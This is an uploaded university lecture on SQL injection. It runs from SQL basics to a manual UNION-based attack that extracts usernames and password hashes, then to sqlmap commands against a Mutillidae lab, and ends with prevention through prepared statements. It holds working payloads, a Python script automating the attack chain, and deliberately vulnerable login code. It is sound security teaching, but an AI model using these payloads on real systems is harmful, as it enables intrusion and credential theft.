Lecture-5 SQLi Detail SWE 4503

The document provides an overview of SQL (Structured Query Language), its capabilities, and various SQL statements, including SELECT, WHERE, ORDER BY, and UNION. It also discusses SQL injection types, exploitation techniques, and prevention methods, emphasizing the importance of input validation and prepared statements. Additionally, it introduces SQLMAP, a tool for automating SQL injection detection and exploitation.

Uploaded by

tasfiatahsin

SQL INJECTION

What is SQL?
• SQL stands for Structured Query Language
• SQL is a standard language for accessing and manipulating databases

What Can SQL do?


• SQL can execute queries against a database
• SQL can retrieve data from a database
• SQL can insert, update, delete records in a database

Source: Reference [2]


Credit: w3schools.com
Database
• A database most often contains one or more tables
• Each table is identified by a name (e.g. "Customers" or "Orders")
• Tables contain records (rows) with data

SQL Syntax
• Most of the actions performed on a database are done with SQL statements
• The following SQL statement selects all the records in the “customers" table:
SELECT * FROM customers;

Keep in Mind That...


• SQL keywords are NOT case sensitive: select is the same as SELECT

Semicolon after SQL Statements?


• Some database systems require a semicolon at the end of each SQL statement
• Semicolon is the standard way to separate each SQL statement in database systems
that allow more than one SQL statement to be executed in the same call to the
server.
SQL SELECT Statement Syntax

• Method1
SELECT * FROM table_name;

• Method2
SELECT column1, column2, ...
FROM table_name;

SQL SELECT Statement Syntax
• Demo Database: northwind

SELECT Column Example


• The following SQL statement selects the "ContactName" and "City" columns from
the “customers" table:
SELECT ContactName, City FROM customers;

SELECT * Example
• The following SQL statement selects all the columns from the “customers" table:
SELECT * FROM customers;

The SQL WHERE Clause
• The WHERE clause is used to filter records.
• It is used to extract only those records that fulfill a specified condition.

WHERE Syntax
SELECT column1, column2, ...
FROM table_name
WHERE condition;

WHERE Clause Example
• The following SQL statement selects all the customers from the country "Mexico",
in the “customers" table.

SELECT * FROM customers
WHERE Country='Mexico';

SQL ORDER BY Keyword
• The ORDER BY keyword is used to sort the result-set in ascending or descending
order.
• The ORDER BY keyword sorts the records in ascending order by default. To sort the
records in descending order, use the DESC keyword.

SELECT column1, column2, ...
FROM table_name
ORDER BY column1, column2, ... ASC|DESC;

ORDER BY Example
• The following SQL statement selects all customers from the “customers" table,
sorted by the "Country" column:
SELECT * FROM customers
ORDER BY Country;

ORDER BY DESC Example
• The following SQL statement selects all customers from the “customers" table,
sorted DESCENDING by the "Country" column:

SELECT * FROM customers
ORDER BY Country DESC;

ORDER BY Several Columns Example
• The following SQL statement selects all customers from the “customers" table,
sorted by the "Country" and the "ContactName" column. This means that it orders
by Country, but if some rows have the same Country, it orders them by
ContactName:
SELECT * FROM customers
ORDER BY Country, ContactName;

SQL UNION Operator
• The UNION operator is used to combine the result-set of two or more SELECT
statements.

• Every SELECT statement within UNION must have the same number of columns
• The columns must also have compatible data types (MySQL is lenient and converts between types; stricter databases reject a mismatch)
• The columns in every SELECT statement must also be in the same order
• UNION drops duplicate rows from the combined result; UNION ALL keeps them, which is why the injection payloads later in this lecture use UNION ALL

UNION Syntax
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
UNION Example
• The following SQL statement returns the cities (only distinct values)
from both the "customers" and the "suppliers" table.

SELECT City FROM customers
UNION
SELECT City FROM suppliers
ORDER BY City;

UNION ALL Syntax
SELECT column_name(s) FROM table1
UNION ALL
SELECT column_name(s) FROM table2;
UNION ALL Example
• The following SQL statement returns the cities (duplicate values also)
from both the "customers" and the "suppliers" table:

SELECT City FROM customers
UNION ALL
SELECT City FROM suppliers
ORDER BY City;

SQL Comments
• Comments are used to explain sections of SQL statements, or to prevent execution
of SQL statements.

Single Line Comments

• Single line comments start with --
• Any text between -- and the end of the line will be ignored (will not be executed).
• In MySQL the -- must be followed by a space or other whitespace to count as a comment. MySQL also accepts # as a single-line comment marker, which is why the injection payloads later in this lecture end in # rather than --.

Examples
SELECT * FROM customers -- WHERE City='Berlin';

Multi-line Comments
• Multi-line comments start with /* and end with */
• Any text between /* and */ will be ignored

Examples
/*select all the columns
of all the records
in the customers table:*/
SELECT * FROM customers;

Types of SQL Injection
• Error-Based SQLi: the application echoes database error messages, which reveal that input reaches the query and can carry extracted data
• Boolean-Based SQLi (blind): no data or error is shown; the attacker infers one bit per request from whether the page differs for a true versus a false injected condition
• Time-Based SQLi (blind): the attacker infers each bit from a delay (e.g. SLEEP()) that the injected condition triggers
• Out-of-band SQLi: results leave over a separate channel, such as a DNS or HTTP request made by the database server itself
• The manual walkthrough that follows uses an error message to detect the flaw and then extracts data with UNION (UNION-based SQLi, an in-band variant); sqlmap's --technique letters B, E, U, S, T, Q correspond to boolean, error, UNION, stacked, time and inline-query techniques
Error Based SQL Injection: Manual Exploitation

URL: http://localhost/dStore/login.php
Error Based SQL Injection: Detection

User ID: user1'

• The stray quote closes the string literal early and leaves the rest of the query unparsable. A login form that displays the resulting database error confirms that the field is spliced into a query without escaping.

Error Based SQL Injection: Identify Column Number

User ID: user1' order by 10 #

User ID: user1' order by 5 #

• ORDER BY n sorts by the n-th selected column and fails when n exceeds the number of columns in the original SELECT. ORDER BY 10 errors and ORDER BY 5 succeeds, so the query returns five columns, and a UNION payload must supply exactly five.
• # starts a MySQL comment, so the closing quote and anything else the application appends are ignored. In a GET parameter it must be URL-encoded as %23; a bare # would be treated as the URL fragment and never reach the server.
Error Based SQL Injection: Identify Vulnerable Column
User ID: user1' union all select 1,2,3,4,5 #

Full Query after UNION:

SELECT id, uname, upass, utype, last_update from user WHERE uname='user1'
UNION ALL SELECT 1,2,3,4,5 #;

• The placeholder numbers that show up in the response identify which of the five columns the page displays; that column is where the following payloads put an expression. The other positions only need to keep the column count (and compatible types) right.
Error Based SQL Injection: Identify Vulnerable Column

User ID: user1' union all select 1,version(),3,4,5 #

User ID: user1' union all select 1,database(),3,4,5 #

User ID: user1' union all select 1,user(),3,4,5 #

• With position 2 confirmed as the displayed column, these three MySQL functions return the server version, the schema the application is connected to, and the account (user@host) it connects with. The account matters for impact: a root account or one holding the FILE privilege turns a data read into file access on the server.
Error Based SQL Injection: Identify Table Name

• information_schema is a read-only metadata database present in every MySQL server. information_schema.tables lists every table the current account can see (table_schema holds the database name, table_name the table), and information_schema.columns lists their columns.

Database: information_schema
Error Based SQL Injection: Identify Table Name

User ID: user1' union all select 1,group_concat(table_name),3,4,5 from
information_schema.tables where table_schema=database() #

• The group_concat() function concatenates the results into a single comma-separated string, so every table name of the current database arrives in the one displayed column.
• group_concat() output is cut off at group_concat_max_len (1024 characters by default), so a long table list may need paging with LIMIT.

Error Based SQL Injection: Identify Column Name
Database: information_schema

User ID: user1' union all select
1,group_concat(0x3C,0x62,0x72,0x3E,column_name),3,4,5
from information_schema.columns where table_name='user'
and table_schema=database() limit 0,25 #

• The group_concat() function concatenates the results into a string.
• 0x3C,0x62,0x72,0x3E are hexadecimal string literals for the characters <, b, r, >, i.e. <br>, so each column name starts on a new line when the browser renders the response. Hex literals avoid putting further quote characters into the payload; the quoted form '<br>' would work as well.
Error Based SQL Injection: Extract Data

User ID: user1' union all select 1, group_concat(0x3C,0x62,0x72,0x3E, uname, 0x0a,
upass), 3, 4, 5 from estore.user limit 0,25 #

• With the table (user) and its columns (uname, upass) known, one request pulls every username and password hash, one pair per line; 0x0a is the newline placed between the two fields. estore.user qualifies the table with its schema name.
Error Based SQL Injection: Crack Hash
• The extracted upass values are password hashes, and a hash cannot be decrypted: it is one-way. Recovering the plaintext means hashing candidate passwords and comparing, which is what an online lookup service does against precomputed tables of common passwords.

URL: https://crackstation.net/ Login as admin user:
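The manual steps above (detection, ORDER BY column counting, UNION extraction through the metadata tables, and hash cracking) replayed end to end, as an added example that is not part of the lecture. It runs against an in-memory SQLite database instead of the MySQL target in the slides, so it uses -- as the comment token where the slides use #, sqlite_master in place of information_schema.tables, and sqlite_version() in place of version(); the user table, its rows, the MD5 hashes and the wordlist are all constructed for the demo.

```python
import hashlib
import sqlite3

# Constructed stand-in for a password wordlist (the slide uses an online lookup table).
WORDLIST = ["password", "123456", "admin", "letmein"]


def setup_db() -> sqlite3.Connection:
    # Constructed schema mirroring the five-column user table shown in the slides.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user(id INTEGER, uname TEXT, upass TEXT, utype TEXT, last_update TEXT);
        INSERT INTO user VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3', 'admin', '2020-01-01');
        INSERT INTO user VALUES (2, 'user1', '202cb962ac59075b964b07152d234b70', 'user', '2020-01-02');
    """)
    return con


def lookup_user_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    # DELIBERATELY VULNERABLE: the User ID field is concatenated into the query text,
    # which is the bug every payload below relies on.
    sql = f"SELECT id, uname, upass, utype, last_update FROM user WHERE uname='{user_id}'"
    return con.execute(sql).fetchall()


def is_injectable(con: sqlite3.Connection) -> bool:
    # Detection: a lone quote leaves the string literal unterminated, so the
    # database raises a syntax error instead of returning rows.
    try:
        lookup_user_vulnerable(con, "user1'")
        return False
    except sqlite3.OperationalError:
        return True


def find_column_count(con: sqlite3.Connection, max_cols: int = 20) -> int:
    # Identify Column Number: ORDER BY n succeeds while n <= number of selected
    # columns and errors once n exceeds it; the last n that worked is the count.
    count = 0
    for n in range(1, max_cols + 1):
        try:
            lookup_user_vulnerable(con, f"user1' ORDER BY {n} --")
            count = n
        except sqlite3.OperationalError:
            break
    return count


def union_fetch(con: sqlite3.Connection, expr: str, from_clause: str = "") -> str:
    # Identify Vulnerable Column / Extract Data: put the expression in the second
    # (displayed) column of a five-column UNION ALL and comment out the rest of
    # the original query.
    payload = f"user1' UNION ALL SELECT 1, {expr}, 3, 4, 5 {from_clause} --"
    rows = lookup_user_vulnerable(con, payload)
    # The injected row is the one whose first column is the marker value 1
    # (the constructed user1 row has id 2, so the two cannot collide).
    return next(str(r[1]) for r in rows if r[0] == 1)


def crack_md5(target_hex: str, wordlist=WORDLIST):
    # "Decrypt Hash": a hash is one-way, so the cracker hashes each candidate and
    # compares, which is what a precomputed-table lookup site does at scale.
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hex.lower():
            return word
    return None


def walkthrough(con: sqlite3.Connection) -> dict:
    creds = union_fetch(con, "group_concat(uname || ':' || upass)", "FROM user")
    admin_hash = dict(pair.split(":", 1) for pair in creds.split(",")).get("admin", "")
    return {
        "injectable": is_injectable(con),
        "columns": find_column_count(con),
        "version": union_fetch(con, "sqlite_version()"),
        # sqlite_master plays the role of information_schema.tables here.
        "tables": union_fetch(con, "group_concat(name)", "FROM sqlite_master WHERE type='table'"),
        "creds": creds,
        "admin_password": crack_md5(admin_hash),
    }


if __name__ == "__main__":
    for key, value in walkthrough(setup_db()).items():
        print(f"{key}: {value}")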


Error Based SQL Injection: Automated Exploitation

SQLMAP
• SQLMAP is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database servers.
• URL: https://sqlmap.org
Error Based SQL Injection
SQLMAP Syntax

sqlmap -u <Target URL (e.g. "http://www.site.com/vuln.php?id=1")>
--method <POST/GET>
--data <Data string to be sent through POST (e.g. "username=user1&pass=123")>
--cookie <HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")>
-p <Testable parameter (e.g. "username")>
--threads=10 -v3 --level=5 --risk=3
--dbms=<Database App Name (e.g. MySQL or Oracle)>
--technique=<SQL injection techniques to use (default "BEUSTQ")>
--current-user

• --level (1 to 5) widens the set of parameters and payloads tested; level 5 also tests cookies and HTTP headers. --risk (1 to 3) widens the payloads, and risk 3 adds OR-based tests that can modify data if the injection lands in an UPDATE or DELETE statement, so use it only on systems you are authorised to damage.
• --technique letters: B boolean-blind, E error-based, U UNION, S stacked queries, T time-blind, Q inline queries. --technique=EU, used below, restricts sqlmap to the two in-band techniques shown in the manual walkthrough.
• --dbms skips fingerprinting when the backend is already known, e.g. from version() above.
Error Based SQL Injection: Gather information
• Firefox Extension: Live HTTP Headers (the browser's Network tab shows the same request)

URL: http://localhost/mutillidae
Go to "OWASP 2017" > "A1 – Injection (SQL)" > "SQLi -Bypass Authentication" > "Login"

Username: user1
Password: 123

• Submit the form once with the capture running and copy three things from the recorded request: the URL (for -u), the POST body (for --data) and the Cookie header (for --cookie). The PHPSESSID value in the cookie keeps sqlmap inside the session the browser established.
Error Based SQL Injection: Get Current User

sqlmap -u "http://192.168.59.134/mutillidae/index.php?page=login.php"
--method POST
--data "username=user1&password=123&login-php-submit-button=Login"
--cookie="showhints=1; PHPSESSID=66t8phka13l345nb46qlpn9jpl"
-p username
--threads=10 -v3 --level=5 --risk=3
--dbms=MySQL
--technique=EU
--current-user
Error Based SQL Injection: Enumerate and Extract
• Each of the following steps reuses the command above, replacing --current-user with:

Get Current DB:     --current-db
Get All DB:         --dbs
Get DB Tables:      -D mutillidae --tables
Get Table Columns:  -D mutillidae -T accounts --columns
Extract Data:       -D mutillidae -T accounts -C cid,username,password --dump

• Once the first run has confirmed the injection, sqlmap records it in its output directory (the path appears in its own log) and the later runs resume from that record instead of re-detecting, going straight to the enumeration the flag asks for.
Impact
• Add, delete, edit or read content in the database, including logging in as any user (the authentication bypass exercised on the Mutillidae page above)
• Read files on the database server, e.g. application source code and configuration, via LOAD_FILE() when the database account holds the FILE privilege (and secure_file_priv allows the path)
• Write files to the database server via SELECT ... INTO OUTFILE; with a web-accessible path this can turn the injection into remote code execution
Prevent SQL Injection
• Use of Prepared Statements (with Parameterized Queries): the primary defence. The query text and the values travel separately, so a quote or comment token in input can never change the structure of the query.
• Input validation: still needed for the parts of a statement a parameter cannot carry, such as table or column names and the ORDER BY direction; accept those only from a fixed allowlist.
• Escaping All User-Supplied Input: a last resort for legacy code. It is easy to get wrong per database and character set, and it does nothing for values spliced in without quotes (e.g. numeric ids).
• Least privilege for the application's database account: no FILE privilege and no access to other schemas, which bounds the impact listed above even if an injection slips through.
• Train and maintain awareness
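The first three prevention points side by side, as an added example that is not from the lecture: the same login lookup written with string concatenation (the bug exploited in the walkthrough) and as a prepared statement, plus an allowlist for a user-chosen ORDER BY column, which a bound parameter cannot carry. The table, rows and hashes are constructed, and the comment token is SQLite's -- rather than MySQL's #.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    # Constructed stand-in for the slides' user table. MD5 values are kept only to
    # match the data extracted in the walkthrough; real code stores a slow salted
    # password hash (bcrypt/scrypt/argon2) and verifies it in application code.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user(id INTEGER, uname TEXT, upass TEXT, utype TEXT);
        INSERT INTO user VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3', 'admin');
        INSERT INTO user VALUES (2, 'user1', '202cb962ac59075b964b07152d234b70', 'user');
    """)
    return con


def login_vulnerable(con: sqlite3.Connection, uname: str, upass_hash: str):
    # DELIBERATELY VULNERABLE: string concatenation, exactly as in the login form
    # attacked above. A comment token in uname removes the password check.
    sql = (f"SELECT uname, utype FROM user "
           f"WHERE uname='{uname}' AND upass='{upass_hash}'")
    rows = con.execute(sql).fetchall()
    return rows[0] if rows else None


def login_safe(con: sqlite3.Connection, uname: str, upass_hash: str):
    # Prepared statement: the driver sends the two values separately from the
    # query text, so a quote or comment token inside them is data, not syntax.
    sql = "SELECT uname, utype FROM user WHERE uname=? AND upass=?"
    rows = con.execute(sql, (uname, upass_hash)).fetchall()
    return rows[0] if rows else None


# Bound parameters cover values only. A user-chosen sort column is an identifier,
# so it is validated against an allowlist (input validation) before being spliced in.
ALLOWED_SORT_COLUMNS = ("id", "uname", "utype")


def is_allowed_sort_column(column: str) -> bool:
    return column in ALLOWED_SORT_COLUMNS


def list_users(con: sqlite3.Connection, sort_by: str = "uname") -> list:
    if not is_allowed_sort_column(sort_by):
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    # Safe to interpolate: sort_by is one of our own literals, never raw input.
    return [row[0] for row in con.execute(f"SELECT uname FROM user ORDER BY {sort_by}")]


if __name__ == "__main__":
    con = setup_db()
    # Classic authentication bypass; the MySQL target in the slides would take "admin' #".
    bypass = "admin' --"
    print("vulnerable:", login_vulnerable(con, bypass, "not-the-hash"))
    print("safe      :", login_safe(con, bypass, "not-the-hash"))
    print("safe, real:", login_safe(con, "admin", "21232f297a57a5a743894a0e4a801fc3"))
    print("sorted    :", list_users(con, "id"))
```

Running the block shows the bypass succeeding against login_vulnerable and returning no row from login_safe with the same input; the allowlist check is what stops a payload such as "uname; DROP TABLE user" from ever reaching the ORDER BY clause.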
Reference
1. Lecture by Mohammad Ariful Islam, Information Security Specialist, BGD e-GOV CIRT, Bangladesh Computer Council, A Short Course
on Cyber Security for Information Age: Practices and Challenges, Organized by Department of CSE, IUT.
